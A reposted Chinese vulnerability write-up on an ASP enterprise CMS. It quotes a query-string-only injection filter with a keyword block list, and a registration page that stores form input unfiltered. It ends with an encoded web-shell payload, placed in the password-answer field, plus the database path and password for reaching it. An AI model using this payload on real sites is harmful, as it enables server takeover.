网站地图    收藏   

主页 > 后端 > 网站安全 >

宏飞企业网站管理系统V1.1 漏洞及修复 - 网站安全

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] is87_sql.asp% Dim GetFlag Rem(提交方式) Dim ErrorSql Rem(非法字符) #39;..略 ErrorSql = #39;~;~and~(~)~exec~update~count~*~%~chr~mid~master~truncate~char~declare Rem(每个敏感字符或者......

is87_sql.asp
<%
    Dim GetFlag Rem(提交方式)
    Dim ErrorSql Rem(非法字符) 
    '..略
    ErrorSql = "'~;~and~(~)~exec~update~count~*~%~chr~mid~master~truncate~char~declare" Rem(每个敏感字符或者词语请使用半角 "~" 格开)
    ErrorSql = split(ErrorSql,"~")
    '..略
        If Instr(LCase(Request.QueryString(RequestKey)),ErrorSql(ForI))<>0 Then
        response.write "<script>alert(""警告:\n请不要尝试非法注入!!"");history.go(-1);</script>"
    '..略 
        response.write "<script>alert(""警告:\n请不要尝试非法注入!!"");history.go(-1);</script>"
    '..略
%>

 

过滤问题。

 


www.2cto.com '\member\register_pass.asp
<!--#include file="../is87_sql.asp"--> 
<%
dim u,i,letters,ip,useradmin,userpassword,userpassword2,sh,zsname,sex,wen,da,gsname,gsadd,youbian,tel,fax,sj,mail,wz,VerifyCode
ip=request.servervariables("remote_addr")
useradmin=replace(trim(request("useradmin")),"'","") 
'..略 
zsname=request.form("zsname")
'..略
rs("userpassword")=md5(request.form("userpassword"))
rs("zsname")=zsname
rs("sex")=sex
Response.Write "<script>alert('恭喜!注册成功,返回首页进行登陆!');window.location.href='/index.asp';</script>" 
%>

 


直接写入数据库。


注册会员,密码保护答案:┼攠數畣整爠煥敵瑳∨≡┩>

 

http://www.2cto.com \data\#is87$cds.asp

 

密码:a

修复:见上文分析

摘自:0855.tv

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论